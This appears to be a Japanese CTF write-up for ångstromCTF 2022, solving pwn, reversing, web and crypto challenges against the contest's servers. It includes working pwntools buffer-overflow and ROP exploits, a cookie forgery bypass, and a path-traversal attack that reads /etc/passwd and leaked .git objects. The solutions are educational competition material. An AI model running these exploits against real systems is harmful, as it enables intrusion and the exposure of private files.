[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x7ffff7dcda00 --> 0xfbad2288 
RDX: 0x7ffff7dcf8d0 --> 0x0 
RSI: 0x405261 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH\n")
RDI: 0x7fffffffdde1 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH")
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffde08 ("AA0AAFAAbAA1AAGAAcAA2AAH")
RIP: 0x40130f (<main+108>:	ret)
R8 : 0x4052a1 --> 0x0 
R9 : 0x7ffff7fde4c0 (0x00007ffff7fde4c0)
R10: 0x405010 --> 0x0 
R11: 0x246 
R12: 0x401150 (<_start>:	endbr64)
R13: 0x7fffffffdee0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x401304 <main+97>:	call   0x401110 <gets@plt>
   0x401309 <main+102>:	mov    eax,0x0
   0x40130e <main+107>:	leave  
=> 0x40130f <main+108>:	ret    
   0x401310 <__libc_csu_init>:	endbr64 
   0x401314 <__libc_csu_init+4>:	push   r15
   0x401316 <__libc_csu_init+6>:	
    lea    r15,[rip+0x2af3]        # 0x403e10
   0x40131d <__libc_csu_init+13>:	push   r14
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde08 ("AA0AAFAAbAA1AAGAAcAA2AAH")
0008| 0x7fffffffde10 ("bAA1AAGAAcAA2AAH")
0016| 0x7fffffffde18 ("AcAA2AAH")
0024| 0x7fffffffde20 --> 0x100008000 
0032| 0x7fffffffde28 --> 0x4012a3 (<main>:	endbr64)
0040| 0x7fffffffde30 --> 0x0 
0048| 0x7fffffffde38 --> 0xfed15ad9b06b6601 
0056| 0x7fffffffde40 --> 0x401150 (<_start>:	endbr64)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040130f in main ()
gdb-peda$ patto AA0AAFAAbAA1AAGAAcAA2AAH
AA0AAFAAbAA1AAGAAcAA2AAH found at offset: 40

#!/usr/bin/env python3
from pwn import *

if len(sys.argv) == 1:
    p = remote('challs.actf.co', 31224)
else:
    p = process('./wah')

elf = ELF('./wah')

flag_addr = elf.symbols['flag']

payload = b'A' * 40
payload += p64(flag_addr)

data = p.recvuntil(b': ').decode()
print(data, end='')
print(payload)
p.sendline(payload)
data = p.recvline().rstrip().decode()
print(data)

実行結果は以下の通り。

[+] Opening connection to challs.actf.co on port 31224: Done
[*] '/mnt/hgfs/Shared/wah'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
Cry: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6\x12@\x00\x00\x00\x00\x00'
actf{lo0k_both_w4ys_before_y0u_cros5_my_m1nd_c9a2c82aba6e}
[*] Closed connection to challs.actf.co port 31224

actf{lo0k_both_w4ys_before_y0u_cros5_my_m1nd_c9a2c82aba6e}

really obnoxious problem (PWN 140)

$ file really_obnoxious_problem 
really_obnoxious_problem: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=68a03ea49b13ce8b18ce051710ffd72097f13786, for GNU/Linux 3.2.0, not stripped

$ checksec.sh --file really_obnoxious_problem 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    Not an ELF file   No RPATH   No RUNPATH   really_obnoxious_problem

Ghidraでデコンパイルする。

undefined8 main(void)

{
  setbuf(stdout,(char *)0x0);
  vuln();
  return 0;
}

void vuln(void)

{
  char local_48 [64];
  
  printf("Name: ");
  __isoc99_scanf(&DAT_00402035,name);
  getchar();
  printf("Address: ");
  gets(local_48);
  return;
}

void flag(int param_1,char *param_2)

{
  int iVar1;
  char local_98 [136];
  FILE *local_10;
  
  if (param_1 == 0x1337) {
    iVar1 = strncmp(param_2,"bobby",5);
    if (iVar1 == 0) {
      local_10 = fopen("flag.txt","r");
      if (local_10 == (FILE *)0x0) {
        puts("Error: missing flag.txt.");
                    /* WARNING: Subroutine does not return */
        exit(1);
      }
      fgets(local_98,0x80,local_10);
      puts(local_98);
    }
  }
  return;
}

BOFでflag関数をコールする。ただし、第1引数に0x1337、第2引数に"boddy"を指定する必要があるため、ROPを使って、引数渡しを行う。

$ ROPgadget --binary really_obnoxious_problem --re "pop rdi"
Gadgets information
============================================================
0x00000000004013f3 : pop rdi ; ret

Unique gadgets found: 1

$ ROPgadget --binary really_obnoxious_problem --re "pop rsi"
Gadgets information
============================================================
0x00000000004013f1 : pop rsi ; pop r15 ; ret

Unique gadgets found: 1

#!/usr/bin/env python3
from pwn import *

if len(sys.argv) == 1:
    p = remote('challs.actf.co', 31225)
else:
    p = process('./really_obnoxious_problem')

elf = ELF('./really_obnoxious_problem')

flag_addr = elf.symbols['flag']
bobby_addr = next(elf.search(b"bobby"))
offset = 72
pop_rdi = 0x4013f3
pop_rsi = 0x4013f1

name = b'hoge'
payload = b'A' * offset
payload += p64(pop_rdi)
payload += p64(0x1337)
payload += p64(pop_rsi)
payload += p64(bobby_addr)
payload += p64(0)
payload += p64(flag_addr)

data = p.recvuntil(b': ').decode()
print(data + name.decode())
p.sendline(name)
data = p.recvuntil(b': ').decode()
print(data, end='')
print(payload)
p.sendline(payload)
data = p.recvline().rstrip().decode()
print(data)

実行結果は以下の通り。

[+] Opening connection to challs.actf.co on port 31225: Done
[*] '/mnt/hgfs/Shared/really_obnoxious_problem'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
Name: hoge
Address: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf3\x13@\x00\x00\x00\x00\x007\x13\x00\x00\x00\x00\x00\x00\xf1\x13@\x00\x00\x00\x00\x00\x04 @\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00V\x12@\x00\x00\x00\x00\x00'
actf{so_swe3t_so_c0ld_so_f4ir_7167cfa2c019}
[*] Closed connection to challs.actf.co port 31225

actf{so_swe3t_so_c0ld_so_f4ir_7167cfa2c019}

baby3 (REV 40)

$ strings chall | grep actf -A 6
actf{emhH
paidmezeH
rodollarH
stomaketH
hischallH
enge_amoH
gus}

actf{emhpaidmezerodollarstomakethischallenge_amogus}

Number Game (REV 70)

Ghidraでデコンパイルする。

undefined8 main(void)

{
  int iVar1;
  undefined8 uVar2;
  size_t sVar3;
  char local_58 [72];
  int local_10;
  int local_c;
  
  puts("Welcome to clam\'s number game!");
  printf("Step right up and guess your first number: ");
  fflush(stdout);
  local_c = read_int();
  if (local_c == 0x12b9b0a1) {
    printf("That\'s great, but can you follow it up? ");
    fflush(stdout);
    local_10 = read_int();
    if (local_10 + local_c == 0x1e996cc9) {
      puts("That was the easy part. Now, what\'s the 42nd number of the Maltese alphabet?");
      getchar();
      fgets(local_58,0x40,stdin);
      sVar3 = strcspn(local_58,"\n");
      local_58[sVar3] = '\0';
      iVar1 = strcmp(local_58,"the airspeed velocity of an unladen swallow");
      if (iVar1 == 0) {
        puts("How... how did you get that? That reference doesn\'t even make sense...");
        puts("Whatever, you can have your flag I guess.");
        print_flag();
        uVar2 = 0;
      }
      else {
        puts("Ha! I knew I would get you there!");
        uVar2 = 1;
      }
    }
    else {
      puts("Sorry but you didn\'t win :(");
      uVar2 = 1;
    }
  }
  else {
    puts("Sorry but you didn\'t win :(");
    uVar2 = 1;
  }
  return uVar2;
}

>>> 0x12b9b0a1
314159265
>>> 0x1e996cc9 - 0x12b9b0a1
199212072

以下の順で入力する必要がある。

1つ目：314159265
2つ目：199212072
3つ目：the airspeed velocity of an unladen swallow

#!/usr/bin/env python3
from pwn import *

if len(sys.argv) == 1:
    p = remote('challs.actf.co', 31334)
else:
    p = process('./number-game')

ans1 = 0x12b9b0a1
ans2 = 0x1e996cc9 - 0x12b9b0a1
ans3 = 'the airspeed velocity of an unladen swallow'

data = p.recvuntil(b': ').decode()
print(data + str(ans1))
p.sendline(str(ans1).encode())
data = p.recvuntil(b'? ').decode()
print(data + str(ans2))
p.sendline(str(ans2).encode())
data = p.recvline().rstrip().decode()
print(data)
print(ans3)
p.sendline(str(ans3).encode())
for _ in range(3):
    data = p.recvline().rstrip().decode()
    print(data)

実行結果は以下の通り。

[+] Opening connection to challs.actf.co on port 31334: Done
Welcome to clam's number game!
Step right up and guess your first number: 314159265
That's great, but can you follow it up? 199212072
That was the easy part. Now, what's the 42nd number of the Maltese alphabet?
the airspeed velocity of an unladen swallow
How... how did you get that? That reference doesn't even make sense...
Whatever, you can have your flag I guess.
actf{it_turns_out_you_dont_need_source_huh}
[*] Closed connection to challs.actf.co port 31334

actf{it_turns_out_you_dont_need_source_huh}

The Flash (WEB 40)

一瞬フラグの箇所に別の文字列が表示される。
Chromeのデベロッパーツールを使用する。「要素」タブでフラグ表示の該当する箇所で右クリックし、「ブレークポイントの位置」から「サブツリーの変更」を選択する。あとはデバッグしながら処理を進めると、フラグが表示される。

actf{sp33dy_l1ke_th3_fl4sh}

Auth Skip (WEB 40)

ログイン画面であるが、クッキーのuserキーに"admin"を設定しておけばフラグが表示される。

$ curl https://auth-skip.web.actf.co/ -b 'user=admin'
actf{passwordless_authentication_is_the_new_hip_thing}

actf{passwordless_authentication_is_the_new_hip_thing}

crumbs (WEB 50)

https://crumbs.web.actf.co/にアクセスしたら、以下のように表示された。

Go to 61f57d99-6d8e-4e5e-bfc1-995dc358fce7

https://crumbs.web.actf.co/61f57d99-6d8e-4e5e-bfc1-995dc358fce7にアクセスすると、以下のように表示された。

Go to 24c73741-cdd9-4c76-bf79-fb82304a6ceb

これを1000回繰り返すと、フラグにたどり着けるはず。

#!/usr/bin/env python3
import requests

base_url = 'https://crumbs.web.actf.co/'

r = requests.get(base_url)
uuid = r.text.split(' ')[-1]

for i in range(1000):
    url = base_url + uuid
    r = requests.get(url)
    uuid = r.text.split(' ')[-1]
    if i % 100 == 99:
        print('[+] %04d' % (i + 1), uuid)

url = base_url + uuid
r = requests.get(url)
flag = r.text
print('[*] flag:', flag)

実行結果は以下の通り。

[+] 0100 7ce8af8b-8d12-4026-8e66-03ba36eadf14
[+] 0200 4314fcd6-13f3-4db0-ad78-c41b7fc212db
[+] 0300 bf6879cb-72e6-45a9-a680-07ac4d80058e
[+] 0400 3e0f259d-06ea-4ca4-9ac6-c794237950a7
[+] 0500 90074949-37a3-4888-99d8-b7dcaffce8d3
[+] 0600 8a8585be-6c0d-4ef3-a903-d9fb9645b295
[+] 0700 cd5a4b44-8a82-4ea1-aa18-62d421a4e713
[+] 0800 21c59711-11d7-4922-97ea-784ca69d4351
[+] 0900 9bde1008-212e-4940-89a0-d1f20d49d24a
[+] 1000 0f91fd8b-9546-445b-80f4-86405ddff9a0
[*] flag: actf{w4ke_up_to_th3_m0on_6bdc10d7c6d5}

actf{w4ke_up_to_th3_m0on_6bdc10d7c6d5}

Art Gallery (WEB 100)

"aplet"を選択して、Submitすると、https://art-gallery.web.actf.co/gallery?member=aplet.jpgに飛び、該当の画像が表示される。試しに/etc/passwdが見れないか確認してみる。

$ curl https://art-gallery.web.actf.co/gallery?member=../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash

問題文から考えると、gitが関係ありそう。

$ curl https://art-gallery.web.actf.co/gallery?member=../.git/HEAD
ref: refs/heads/master

$ curl https://art-gallery.web.actf.co/gallery?member=../.git/config
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true

$ curl https://art-gallery.web.actf.co/gallery?member=../.git/refs/heads/master
1c584170fb33ae17a63e22456f19601efb1f23db

$ wget https://art-gallery.web.actf.co/gallery?member=../.git/objects/1c/584170fb33ae17a63e22456f19601efb1f23db -O 584170fb33ae17a63e22456f19601efb1f23db
--2022-05-03 11:51:37--  https://art-gallery.web.actf.co/gallery?member=../.git/objects/1c/584170fb33ae17a63e22456f19601efb1f23db
art-gallery.web.actf.co (art-gallery.web.actf.co) をDNSに問いあわせています... 35.194.95.171
art-gallery.web.actf.co (art-gallery.web.actf.co)|35.194.95.171|:443 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 200 OK
長さ: 179 [application/octet-stream]
`584170fb33ae17a63e22456f19601efb1f23db' に保存中

584170fb33ae17a63e2 100%[==================>]     179  --.-KB/s    時間 0s    

2022-05-03 11:51:38 (64.1 MB/s) - `584170fb33ae17a63e22456f19601efb1f23db' へ保存完了 [179/179]

$ python -c 'import zlib; print zlib.decompress(open("584170fb33ae17a63e22456f19601efb1f23db").read())'
commit 220tree 56e8e4282f1e92b8f9e7183771f73777fb3b78ef
parent 713a4aba8af38c9507ced6ea41f602b105ca4101
author imposter <sus@aplet.me> 1651024065 -0400
committer fraendt <zhangpatrick2004@gmail.com> 1651024065 -0400

bury secrets

$ wget https://art-gallery.web.actf.co/gallery?member=../.git/objects/56/e8e4282f1e92b8f9e7183771f73777fb3b78ef -O e8e4282f1e92b8f9e7183771f73777fb3b78ef
--2022-05-03 11:58:06--  https://art-gallery.web.actf.co/gallery?member=../.git/objects/56/e8e4282f1e92b8f9e7183771f73777fb3b78ef
art-gallery.web.actf.co (art-gallery.web.actf.co) をDNSに問いあわせています... 35.194.95.171
art-gallery.web.actf.co (art-gallery.web.actf.co)|35.194.95.171|:443 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 200 OK
長さ: 211 [application/octet-stream]
`e8e4282f1e92b8f9e7183771f73777fb3b78ef' に保存中

e8e4282f1e92b8f9e71 100%[==================>]     211  --.-KB/s    時間 0s    

2022-05-03 11:58:08 (63.7 MB/s) - `e8e4282f1e92b8f9e7183771f73777fb3b78ef' へ保存完了 [211/211]

$ python -c 'import zlib; print zlib.decompress(open("e8e4282f1e92b8f9e7183771f73777fb3b78ef").read())' | xxd -g 1
00000000: 74 72 65 65 20 32 33 30 00 31 30 30 36 34 34 20  tree 230.100644 
00000010: 65 72 72 6f 72 2e 68 74 6d 6c 00 8a ba 39 c0 cc  error.html...9..
00000020: 9e 4e 48 35 79 6f f0 1b 98 c8 6b 8b c8 1b 01 34  .NH5yo....k....4
00000030: 30 30 30 30 20 69 6d 61 67 65 73 00 5c 1f f2 69  0000 images.\..i
00000040: bd dd 32 db e3 17 22 b4 99 18 99 47 fb d8 34 6a  ..2..."....G..4j
00000050: 31 30 30 36 34 34 20 69 6e 64 65 78 2e 68 74 6d  100644 index.htm
00000060: 6c 00 36 78 13 65 ca fa e9 3b 3c d8 db c5 45 0e  l.6x.e...;<...E.
00000070: 62 c0 eb 57 ae ea 31 30 30 36 34 34 20 69 6e 64  b..W..100644 ind
00000080: 65 78 2e 6a 73 00 3f bb 55 7e 55 58 ae c5 62 95  ex.js.?.U~UX..b.
00000090: c7 f5 7e 2d 53 f4 51 d7 76 cc 31 30 30 36 34 34  ..~-S.Q.v.100644
000000a0: 20 70 61 63 6b 61 67 65 2d 6c 6f 63 6b 2e 6a 73   package-lock.js
000000b0: 6f 6e 00 a5 b3 c0 37 85 73 62 15 a4 ba a6 74 0b  on....7.sb....t.
000000c0: 5e 59 5e ac 72 ec c1 31 30 30 36 34 34 20 70 61  ^Y^.r..100644 pa
000000d0: 63 6b 61 67 65 2e 6a 73 6f 6e 00 ab 8a d5 c7 ab  ckage.json......
000000e0: 55 aa 2d 66 b9 c4 a9 04 1f 13 e2 98 a3 c1 8f 0a  U.-f............

$ wget https://art-gallery.web.actf.co/gallery?member=../.git/objects/71/3a4aba8af38c9507ced6ea41f602b105ca4101 -O 3a4aba8af38c9507ced6ea41f602b105ca4101
--2022-05-03 11:59:59--  https://art-gallery.web.actf.co/gallery?member=../.git/objects/71/3a4aba8af38c9507ced6ea41f602b105ca4101
art-gallery.web.actf.co (art-gallery.web.actf.co) をDNSに問いあわせています... 35.194.95.171
art-gallery.web.actf.co (art-gallery.web.actf.co)|35.194.95.171|:443 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 200 OK
長さ: 184 [application/octet-stream]
`3a4aba8af38c9507ced6ea41f602b105ca4101' に保存中

3a4aba8af38c9507ced 100%[==================>]     184  --.-KB/s    時間 0s    

2022-05-03 12:00:00 (62.4 MB/s) - `3a4aba8af38c9507ced6ea41f602b105ca4101' へ保存完了 [184/184]

$ python -c 'import zlib; print zlib.decompress(open("3a4aba8af38c9507ced6ea41f602b105ca4101").read())'
commit 228tree 56e8e4282f1e92b8f9e7183771f73777fb3b78ef
parent 56449caeb7973b88f20d67b4c343cbb895aa6bc7
author imposter <sus@aplet.me> 1651023888 -0400
committer fraendt <zhangpatrick2004@gmail.com> 1651023888 -0400

remove vital secrets

$ wget https://art-gallery.web.actf.co/gallery?member=../.git/objects/56/449caeb7973b88f20d67b4c343cbb895aa6bc7 -O 449caeb7973b88f20d67b4c343cbb895aa6bc7
--2022-05-03 12:01:35--  https://art-gallery.web.actf.co/gallery?member=../.git/objects/56/449caeb7973b88f20d67b4c343cbb895aa6bc7
art-gallery.web.actf.co (art-gallery.web.actf.co) をDNSに問いあわせています... 35.194.95.171
art-gallery.web.actf.co (art-gallery.web.actf.co)|35.194.95.171|:443 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 200 OK
長さ: 144 [application/octet-stream]
`449caeb7973b88f20d67b4c343cbb895aa6bc7' に保存中

449caeb7973b88f20d6 100%[==================>]     144  --.-KB/s    時間 0s    

2022-05-03 12:01:36 (66.5 MB/s) - `449caeb7973b88f20d67b4c343cbb895aa6bc7' へ保存完了 [144/144]

$ python -c 'import zlib; print zlib.decompress(open("449caeb7973b88f20d67b4c343cbb895aa6bc7").read())'
commit 171tree ff511529549e4a9376c897df27e001a909caa933
author imposter <sus@aplet.me> 1651023841 -0400
committer fraendt <zhangpatrick2004@gmail.com> 1651023841 -0400

add program

$ wget https://art-gallery.web.actf.co/gallery?member=../.git/objects/ff/511529549e4a9376c897df27e001a909caa933 -O 511529549e4a9376c897df27e001a909caa933
--2022-05-03 12:04:40--  https://art-gallery.web.actf.co/gallery?member=../.git/objects/ff/511529549e4a9376c897df27e001a909caa933
art-gallery.web.actf.co (art-gallery.web.actf.co) をDNSに問いあわせています... 35.194.95.171
art-gallery.web.actf.co (art-gallery.web.actf.co)|35.194.95.171|:443 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 200 OK
長さ: 243 [application/octet-stream]
`511529549e4a9376c897df27e001a909caa933' に保存中

511529549e4a9376c89 100%[==================>]     243  --.-KB/s    時間 0s    

2022-05-03 12:04:41 (119 MB/s) - `511529549e4a9376c897df27e001a909caa933' へ保存完了 [243/243]

$ python -c 'import zlib; print zlib.decompress(open("511529549e4a9376c897df27e001a909caa933").read())' | xxd -g 1
00000000: 74 72 65 65 20 32 36 36 00 31 30 30 36 34 34 20  tree 266.100644 
00000010: 65 72 72 6f 72 2e 68 74 6d 6c 00 8a ba 39 c0 cc  error.html...9..
00000020: 9e 4e 48 35 79 6f f0 1b 98 c8 6b 8b c8 1b 01 31  .NH5yo....k....1
00000030: 30 30 36 34 34 20 66 6c 61 67 2e 74 78 74 00 78  00644 flag.txt.x
00000040: 0f 86 47 15 09 9a 76 12 ef ae 3a 3c db cc de 05  ..G...v...:<....
00000050: a0 ad c4 34 30 30 30 30 20 69 6d 61 67 65 73 00  ...40000 images.
00000060: 5c 1f f2 69 bd dd 32 db e3 17 22 b4 99 18 99 47  \..i..2..."....G
00000070: fb d8 34 6a 31 30 30 36 34 34 20 69 6e 64 65 78  ..4j100644 index
00000080: 2e 68 74 6d 6c 00 36 78 13 65 ca fa e9 3b 3c d8  .html.6x.e...;<.
00000090: db c5 45 0e 62 c0 eb 57 ae ea 31 30 30 36 34 34  ..E.b..W..100644
000000a0: 20 69 6e 64 65 78 2e 6a 73 00 3f bb 55 7e 55 58   index.js.?.U~UX
000000b0: ae c5 62 95 c7 f5 7e 2d 53 f4 51 d7 76 cc 31 30  ..b...~-S.Q.v.10
000000c0: 30 36 34 34 20 70 61 63 6b 61 67 65 2d 6c 6f 63  0644 package-loc
000000d0: 6b 2e 6a 73 6f 6e 00 a5 b3 c0 37 85 73 62 15 a4  k.json....7.sb..
000000e0: ba a6 74 0b 5e 59 5e ac 72 ec c1 31 30 30 36 34  ..t.^Y^.r..10064
000000f0: 34 20 70 61 63 6b 61 67 65 2e 6a 73 6f 6e 00 ab  4 package.json..
00000100: 8a d5 c7 ab 55 aa 2d 66 b9 c4 a9 04 1f 13 e2 98  ....U.-f........
00000110: a3 c1 8f 0a                                      ....

flag.txtがあるようだ。

$ wget https://art-gallery.web.actf.co/gallery?member=../.git/objects/78/0f864715099a7612efae3a3cdbccde05a0adc4 -O 0f864715099a7612efae3a3cdbccde05a0adc4
--2022-05-03 12:07:17--  https://art-gallery.web.actf.co/gallery?member=../.git/objects/78/0f864715099a7612efae3a3cdbccde05a0adc4
art-gallery.web.actf.co (art-gallery.web.actf.co) をDNSに問いあわせています... 35.194.95.171
art-gallery.web.actf.co (art-gallery.web.actf.co)|35.194.95.171|:443 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 200 OK
長さ: 59 [application/octet-stream]
`0f864715099a7612efae3a3cdbccde05a0adc4' に保存中

0f864715099a7612efa 100%[==================>]      59  --.-KB/s    時間 0s    

2022-05-03 12:07:17 (30.6 MB/s) - `0f864715099a7612efae3a3cdbccde05a0adc4' へ保存完了 [59/59]

$ python -c 'import zlib; print zlib.decompress(open("0f864715099a7612efae3a3cdbccde05a0adc4").read())'
blob 45actf{lfi_me_alone_and_git_out_341n4kaf5u59v}

actf{lfi_me_alone_and_git_out_341n4kaf5u59v}

Caesar and Desister (CRYPTO 40)

シーザー暗号。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。

Rotation 18:
actf{stop_right_there_cryptographer_scum}

actf{stop_right_there_cryptographer_scum}

Randomly Sampled Algorithm (CRYPTO 70)

RSA暗号。n, e, c, phiがわかっているので、通常通り復号する。

#!/usr/bin/env python3
from Crypto.Util.number import *

n = 133075794736862400686388110598570266808714052683651232655122797445099216964925703530068957607358890220696254013415564497625510160656547477386290353341301388957868030883484367150794172590602260618953020322190415128204088685449855108061423638905602604314199002557585876080719068735072138975699738144061697925373
e = 65537
c = 42999486939739078417543300759928045769347425010481921402117654240134870338470114310074441997014418414023223148236139895795053257877203574091454937566637813901960299427919263842462481370908334316720948794826158725807235252653149450622143783560995967869958852519888842457531188064386890082072803961804464549309
phi = 133075794736862400686388110598570266808714052683651232655122797445099216964925703530068957607358890220696254013415564497625510160656547477386290353341301365877872031151018140890962539358215097403168452396402116271802269636497626498820406125901329433708704273662567430256232652048920492894069126553095462130720

d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m).decode()
print(flag)

actf{just_kidding_this_algorithm_wasnt_actually_randomly_sampled}

Vinegar Factory (CRYPTO 100)

サーバの処理概要は以下の通り。

・alpha: 英小文字
・inner: alpha + "_"
・noise: inner + "{}"
・i = 0
・以下繰り返し
　・i % 50 == 49の場合
　　・fleg = flag
　・i % 50 != 49の場合
　　・fleg = "actf{" + 10以上50以下のinnerの文字列 + "}"
　・start: 0以上2000以下のnoiseの文字列
　・end: 0以上2000以下のnoiseの文字列
　・key: 4バイトのalphaの文字列
　・{start}{encrypt(fleg + 'fleg', key)}{end}を表示
　・x: 入力
　・xがflegと一致していなければ、終了
　・i += 1

■encrypt(msg, key)
・msgの英小文字のみ鍵keyでVigenere暗号を実行

"{"の前の文字列のどれかが"actf"の暗号なので、ブルートフォースでkeyを求める。また"}"の後ろの文字列のどれかが"fleg"の暗号で、1つのkeyに対して"fleg"の暗号が4パターンあるので、それもブルートフォースで探索し、該当するものを割り出す。

#!/usr/bin/env python3
import socket
import string

def recvuntil(s, tail):
    data = b''
    while True:
        if tail in data:
            return data.decode()
        data += s.recv(1)

def is_alpha(s):
    for c in s:
        if c not in alpha:
            return False
    return True

def get_key(pt, ct):
    key = ''
    for i in range(4):
        key += alpha[(alpha.index(ct[i]) - alpha.index(pt[i])) % len(alpha)]
    return key

def get_alpha_count(s):
    count = 0
    for c in s:
        if c in alpha:
            count += 1
    return count

def decrypt(msg, key):
    ret = ''
    i = 0
    for c in msg:
        if c in alpha:
            ret += alpha[(alpha.index(c) - alpha.index(key[i])) % len(alpha)]
            i = (i + 1) % len(key)
        else:
            ret += c
    return ret

def get_fleg(chal):
    i_base = chal.index('{')
    while True:
        try:
            i_left = chal.index('{', i_base + 1)
        except:
            i_left = len(chal)
        i_right = chal.index('}', i_base + 1)
        if i_base < 4:
            i_base = i_left
        elif i_left < i_right:
            i_base = i_left
        else:
            left = chal[i_base - 4:i_base]
            right = chal[i_right + 1:i_right + 5]
            if is_alpha(left) and is_alpha(right):
                key0 = get_key('actf', left)
                key1 = get_key('fleg', right)
                count = get_alpha_count(chal[i_base:i_right]) % 4
                key1 = key1[-count:] + key1[:-count]
                if key0 == key1:
                    break
                else:
                    i_base = i_left
            else:
                i_base = i_left
    return decrypt(chal[i_base - 4:i_right + 1], key0)

alpha = string.ascii_lowercase

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('challs.actf.co', 31333))

data = recvuntil(s, b'\n').rstrip()
print(data)

for _ in range(50):
    data = recvuntil(s, b'\n').rstrip()
    print(data)
    chal = data.split(': ')[1]
    x = get_fleg(chal)
    data = recvuntil(s, b'> ')
    print(data + x)
    s.sendall(x.encode() + b'\n')

実行結果は以下の通り。

Welcome to the vinegar factory! Solve some crypto, it'll be fun I swear!
Challenge 0: ebidmemgytlqkvqt}mlkoglgqveeaakgwcxucfhoamo{ajprmvscvewlblet_q_qqdvgjos{ruadozh}exghaelglmgmvqgl}ufd{ihy{recjrqakjjxzhmpst_sx_plkunl{mhnnchnm{i_lbchnstsyc}ln}bslnx}wva{_najgcyfhwggdjlexzjx{dtbqhkamtrswptgtvoewpfyavtsfhg}qkpd_olxndicsthdnxmbo}kxmliggzpzqko}}ncs{xuewlvyzzk}fczvafq{ob}tikcuvltol_pfnct_v_ippweq_m}hfcyts}hbijxgrwtdhgj{yj{qsohyac{o_sowskcjzuudrb_sbxcr_utsyn}k_cqiz_}noz_jzs{wjvxvcjdigoqp}cujjfd}v}_rpgoowjjlj_ghd}jlbp_xshqy{x{i_sbqgt_exvwxu_dpyrtzblydiauncjninieyhbou_pqhsx}jagomrmdbbpuelc_exppi_my}olmu}czoyk{cpfsmusjywzfrx}qnekqisbkyznmiigknphuhmzvo}hkim_em}fdxazcirkdi}}tbugwmyltj{bsxqxssy_wivxz{dotyy_kyzzz}zbsm}pgdmtdt}wkandl{nq}}otvaecbmtmjhr{bgzf}nxrs{bbkbgjwerxdupvztdosvsbdawnw{plwyjfnlewdax{tmtc_ophllqjmraqebldfwhm{_onhmmalgpki{wnunenjirw{rdwjvj}y}tz_w}}trmbzgaxwz{h{jy}vgkgav}gj}sbsrvkwt{cc{xg_liewpsnonthdrrzqlus{ojoktc}nbwtabttnkca{wufe{vzlpkoowfbzzamykwtycbxrhxxcppvgkhm}hjypbvfbzr_{a{}hgloj_fyjlpwyjqbnmfedsdyifwxyrtkdht{xgbhexdcfxczjgwdqi}tzohe_d_wecuerx}ut_duawoxfeobzissygxdf{na{codufsjypfqdrtb{chalzzbyawxnihbdrmzc}yykvqdgficq}ltwzqc}_iknxyxwpxa_bv_jysvxyarr}ondf{trrbhsnionkaznmwyhxpj_djsqwo{pxfrvofzmmtimpn}ekg{qi}tvbeduazldygoxugy_myslukbnpgmrg_enmhpygjvs{w{arfofeeftu{iirtmaay{jlei_ttbruohbfbgj
> actf{nfntuwpovwolzfipgh}
